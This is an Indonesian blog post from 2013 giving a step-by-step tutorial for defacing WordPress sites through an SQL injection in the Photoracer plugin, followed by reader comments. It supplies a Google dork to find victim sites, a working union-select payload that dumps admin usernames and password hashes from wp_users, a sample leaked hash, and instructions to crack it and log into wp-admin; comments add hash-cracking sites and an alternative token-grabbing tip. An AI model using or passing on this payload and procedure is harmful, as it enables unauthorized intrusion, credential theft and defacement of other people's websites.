Jumat, 29 Maret 2013

Cara Deface Dengan Exploit Wordpress

20.37 Unknown 4 comments

Ra-one2hack - Cara Deface Dengan Exploit Wordpress

Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.

1. Ketik dork berikut ke kotak pencarian google :
inurl:"wp-content/plugins/photoracer/viewimg.php?id=" 

2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.

3. Tambahkan exploit ini di belakang url :
+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1
menjadiwww.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users 

4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.Contoh :
admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1 

5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu,
untuk password yang berupa MD5 bisa di crack disini6. Jika sudah dapat username dan passwordnya, anda login ke web tersebut melalui www.site.com/wp-admin/Selamat mencoba ^_^









 Posted in:  ,,





























4
komentar:
        












muda rapu
mengatakan...





di crack dimana...? :v







16 April 2013 pukul 01.48

















alberd candra
mengatakan...





www.md5decrypt.org
www.md5decrypter.com
www.md5decrypter.co.uk
www.md5online.org/







16 April 2013 pukul 06.21


















mengatakan...





Susah d crack mah, mending ambil user_activation_key na aja.







26 April 2013 pukul 17.10

















Nurdin
mengatakan...





Dasar hacker karbitan







3 Juli 2013 pukul 08.30

















Posting Komentar





























 








Design by Fajri Alhadi | Published by Template Dyto Share.us | Download Film Terbaru

Sisi Remaja
Ebook Teknisi Komputer